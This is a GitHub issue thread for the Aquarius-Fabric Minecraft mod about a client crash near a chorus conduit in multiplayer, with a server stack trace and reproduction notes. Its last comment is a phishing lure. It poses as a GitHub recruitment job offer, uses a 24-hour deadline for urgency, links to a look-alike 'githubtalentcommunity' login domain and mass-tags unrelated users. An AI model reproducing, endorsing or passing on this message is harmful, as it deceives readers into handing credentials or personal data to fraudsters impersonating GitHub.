### ISSUE TITLE
Using the Chorus Conduit in MP Causes Client Crash - 1.3.1+1.14.1

### ISSUE THREAD

**Issue by Arkhayla** [Boundarybreaker/Aquarius-Fabric#4]
While playing in MP (Server hosted on Ubuntu LTS via Linode)
Attempting to sprint/swim in the vicinity of a chorus conduit will crash the client user. The server remains stable.

`[19:04:06] [Server thread/WARN]: Failed to handle packet for /174.22.188.160:56312
net.minecraft.class_148: Ticking player
        at net.minecraft.class_3222.method_14226(class_3222.java:450) ~[intermediary-server.jar:?]
        at net.minecraft.class_3244.method_18784(class_3244.java:194) ~[intermediary-server.jar:?]
        at net.minecraft.class_2535.method_10754(class_2535.java:243) ~[intermediary-server.jar:?]
        at net.minecraft.class_3242.method_14357(class_3242.java:171) [intermediary-server.jar:?]
        at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:842) [intermediary-server.jar:?]
        at net.minecraft.class_3176.method_3813(class_3176.java:343) [intermediary-server.jar:?]
        at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:764) [intermediary-server.jar:?]
        at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:632) [intermediary-server.jar:?]
        at java.lang.Thread.run(Thread.java:834) [?:?]
Caused by: java.lang.NoSuchMethodError: net.minecraft.class_1657.method_5663()Lnet/minecraft/class_243;
        at net.minecraft.class_1657.handler$updateAirSwimming$zbc000(class_1657.java:2261) ~[intermediary-server.jar:?]
        at net.minecraft.class_1657.method_5790(class_1657.java:1546) ~[intermediary-server.jar:?]
        at net.minecraft.class_1297.method_5876(class_1297.java:995) ~[intermediary-server.jar:?]
        at net.minecraft.class_1297.method_5670(class_1297.java:414) ~[intermediary-server.jar:?]
        at net.minecraft.class_1309.method_5670(class_1309.java:283) ~[intermediary-server.jar:?]
        at net.minecraft.class_1297.method_5773(class_1297.java:388) ~[intermediary-server.jar:?]
        at net.minecraft.class_1309.method_5773(class_1309.java:2037) ~[intermediary-server.jar:?]
        at net.minecraft.class_1657.method_5773(class_1657.java:262) ~[intermediary-server.jar:?]
        at net.minecraft.class_3222.method_14226(class_3222.java:386) ~[intermediary-server.jar:?]
        ... 8 more`

**Comment by LemmaEOF** [comment]
I’ve gotten reports of this issue before but I have no idea what’s causing it.

**Comment by Arkhayla** [comment]
If it is helpful, it's 100% reproducible on my server, I can share details for you to attempt it there. Not sure how detailed the debug utilities are for mods thoug. I'm curious if it is other mod interations too, I have multiple mods running - I will determine if this happens when aquarius is the only mod enabled.

**Comment by Arkhayla** [comment]
I can confirm this crash still occurs when the only enabled mods on the server and clients are the fabric api, and aquarius. 

Tested on both Fabric 0.4.2.26 and 0.4.2.27 with the latest versions of Aquarius and Fabric API as of today
![image](https://user-images.githubusercontent.com/2049305/58373968-28501380-7ef3-11e9-97b5-8af17cdae182.png)

Again, let me know if you'd like to attempt it on my server, completely reproducible here.

**Comment by leojin** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
pdeligia, @gejiliang, @jjyr, @gangooteli, @blooalien, @prine, @tensortalk, @imkimchi, @expose, @stepsal, @mikedemarais, @ggarza5, @yesh0907, @stiucsib86, @morning71, @smonami, @hello2mao, @talesmousinho, @hopkinskong, @RobinAllenson
